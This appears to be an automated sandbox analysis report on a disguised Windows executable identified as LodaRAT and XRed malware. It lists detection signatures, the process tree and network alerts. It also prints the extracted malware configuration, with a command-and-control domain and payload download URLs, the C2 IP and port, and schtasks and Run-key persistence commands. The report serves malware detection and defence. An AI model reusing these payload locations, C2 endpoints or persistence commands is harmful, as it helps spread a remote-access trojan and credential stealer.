Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Supplier 0202AW-PER2 Sheet.exe

Overview

General Information

Sample name:Supplier 0202AW-PER2 Sheet.exe
Analysis ID:1582318
MD5:97e5ba8188b0e2613fd02ee2b8dfee7a
SHA1:17e314b66392d3d14e68f3e4a0ce4e3649255835
SHA256:2d976b78efe5c7e983ff4cef98deb25d21a901e8f954f6d915d5642e75420296
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • Supplier 0202AW-PER2 Sheet.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe" MD5: 97E5BA8188B0E2613FD02EE2B8DFEE7A)
    • ._cache_Supplier 0202AW-PER2 Sheet.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" MD5: DB7FC8188230C44A2B7360862DCF26E9)
      • cmd.exe (PID: 7512 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7572 cmdline: schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7548 cmdline: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 7412 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 1D45B99034D67448EBF0776BD5699C84)
      • WerFault.exe (PID: 8264 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 7800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7452 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 8876 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • DELPQB.exe (PID: 7612 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • Synaptics.exe (PID: 6752 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 1D45B99034D67448EBF0776BD5699C84)
  • DELPQB.exe (PID: 1168 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • DELPQB.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • DELPQB.exe (PID: 8316 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • DELPQB.exe (PID: 8456 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • DELPQB.exe (PID: 8748 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: DB7FC8188230C44A2B7360862DCF26E9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
SourceRuleDescriptionAuthorStrings
Supplier 0202AW-PER2 Sheet.exeJoeSecurity_XRedYara detected XRedJoe Security
    Supplier 0202AW-PER2 Sheet.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_LodaRat_1Yara detected LodaRATJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\ZMNYQK.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
          C:\ProgramData\Synaptics\RCXC902.tmpJoeSecurity_XRedYara detected XRedJoe Security
            C:\ProgramData\Synaptics\RCXC902.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              C:\Users\user\Documents\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
                C:\Users\user\Documents\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  Click to see the 2 entries
                  SourceRuleDescriptionAuthorStrings
                  00000007.00000002.2484943427.0000000002F58000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                    00000002.00000002.2498031591.0000000004DCC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                      00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                        00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                          00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                            Click to see the 8 entries
                            SourceRuleDescriptionAuthorStrings
                            0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                              0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                                System Summary

                                barindex
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, Initiated: true, ProcessId: 7384, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49728
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessId: 7384, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ZMNYQK
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZMNYQK.lnk
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine: schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7512, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ProcessId: 7572, ProcessName: schtasks.exe
                                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe" , ParentImage: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe, ParentProcessId: 7384, ParentProcessName: ._cache_Supplier 0202AW-PER2 Sheet.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs, ProcessId: 7548, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe, ProcessId: 7292, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7412, TargetFilename: C:\Users\user~1\AppData\Local\Temp\zWdpyzM9.xlsm
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T10:58:09.817408+010020448871A Network Trojan was detected192.168.2.749705216.58.206.46443TCP
                                2024-12-30T10:58:09.913069+010020448871A Network Trojan was detected192.168.2.749704216.58.206.46443TCP
                                2024-12-30T10:58:10.879731+010020448871A Network Trojan was detected192.168.2.749712216.58.206.46443TCP
                                2024-12-30T10:58:10.918675+010020448871A Network Trojan was detected192.168.2.749709216.58.206.46443TCP
                                2024-12-30T10:58:12.421827+010020448871A Network Trojan was detected192.168.2.749715216.58.206.46443TCP
                                2024-12-30T10:58:12.441368+010020448871A Network Trojan was detected192.168.2.749716216.58.206.46443TCP
                                2024-12-30T10:58:13.517215+010020448871A Network Trojan was detected192.168.2.749723216.58.206.46443TCP
                                2024-12-30T10:58:13.527812+010020448871A Network Trojan was detected192.168.2.749721216.58.206.46443TCP
                                2024-12-30T10:58:14.517817+010020448871A Network Trojan was detected192.168.2.749736216.58.206.46443TCP
                                2024-12-30T10:58:14.522804+010020448871A Network Trojan was detected192.168.2.749737216.58.206.46443TCP
                                2024-12-30T10:58:15.443750+010020448871A Network Trojan was detected192.168.2.749748216.58.206.46443TCP
                                2024-12-30T10:58:15.443767+010020448871A Network Trojan was detected192.168.2.749749216.58.206.46443TCP
                                2024-12-30T10:58:16.611701+010020448871A Network Trojan was detected192.168.2.749764216.58.206.46443TCP
                                2024-12-30T10:58:16.613834+010020448871A Network Trojan was detected192.168.2.749763216.58.206.46443TCP
                                2024-12-30T10:58:17.594819+010020448871A Network Trojan was detected192.168.2.749772216.58.206.46443TCP
                                2024-12-30T10:58:17.602167+010020448871A Network Trojan was detected192.168.2.749771216.58.206.46443TCP
                                2024-12-30T10:58:18.591556+010020448871A Network Trojan was detected192.168.2.749785216.58.206.46443TCP
                                2024-12-30T10:58:18.599250+010020448871A Network Trojan was detected192.168.2.749786216.58.206.46443TCP
                                2024-12-30T10:58:19.645197+010020448871A Network Trojan was detected192.168.2.749799216.58.206.46443TCP
                                2024-12-30T10:58:19.653539+010020448871A Network Trojan was detected192.168.2.749800216.58.206.46443TCP
                                2024-12-30T10:58:20.615514+010020448871A Network Trojan was detected192.168.2.749808216.58.206.46443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T10:58:12.936943+010028221161Malware Command and Control Activity Detected192.168.2.749728172.111.138.1005552TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T10:58:26.813226+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.749728TCP
                                2024-12-30T10:58:59.134244+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.749728TCP
                                2024-12-30T10:59:35.571823+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.749728TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T10:58:10.203162+010028326171Malware Command and Control Activity Detected192.168.2.74970869.42.215.25280TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T10:57:56.192769+010028498851Malware Command and Control Activity Detected192.168.2.749728172.111.138.1005552TCP
                                2024-12-30T10:58:12.936943+010028498851Malware Command and Control Activity Detected192.168.2.749728172.111.138.1005552TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: Supplier 0202AW-PER2 Sheet.exeAvira: detected
                                Source: Supplier 0202AW-PER2 Sheet.exeAvira: detected
                                Source: http://xred.site50.net/syn/Synaptics.rarAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SUpdate.ini01Avira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/Synaptics.rar4Avira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SUpdate.iniAvira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Local\Temp\ZMNYQK.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\RCXC902.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\RCXC902.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: Supplier 0202AW-PER2 Sheet.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                                Source: C:\ProgramData\Synaptics\RCXC902.tmpReversingLabs: Detection: 100%
                                Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeReversingLabs: Detection: 55%
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeReversingLabs: Detection: 55%
                                Source: C:\Users\user\Documents\~$cache1ReversingLabs: Detection: 100%
                                Source: Supplier 0202AW-PER2 Sheet.exeVirustotal: Detection: 84%Perma Link
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.8% probability
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\RCXC902.tmpJoe Sandbox ML: detected
                                Source: Supplier 0202AW-PER2 Sheet.exeJoe Sandbox ML: detected
                                Source: Supplier 0202AW-PER2 Sheet.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49704 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49709 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49710 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49712 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49711 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49723 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49721 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49727 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49773 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49774 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49771 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49772 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49786 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49809 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49808 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59828 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59829 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59841 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59840 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59866 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59867 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59902 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59904 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:59912 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:59915 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59958 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:59957 version: TLS 1.2
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exe, 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: Supplier 0202AW-PER2 Sheet.exeBinary or memory string: [autorun]
                                Source: Supplier 0202AW-PER2 Sheet.exeBinary or memory string: [autorun]
                                Source: Supplier 0202AW-PER2 Sheet.exeBinary or memory string: autorun.inf
                                Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                                Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                                Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                                Source: ~$cache1.3.drBinary or memory string: [autorun]
                                Source: ~$cache1.3.drBinary or memory string: [autorun]
                                Source: ~$cache1.3.drBinary or memory string: autorun.inf
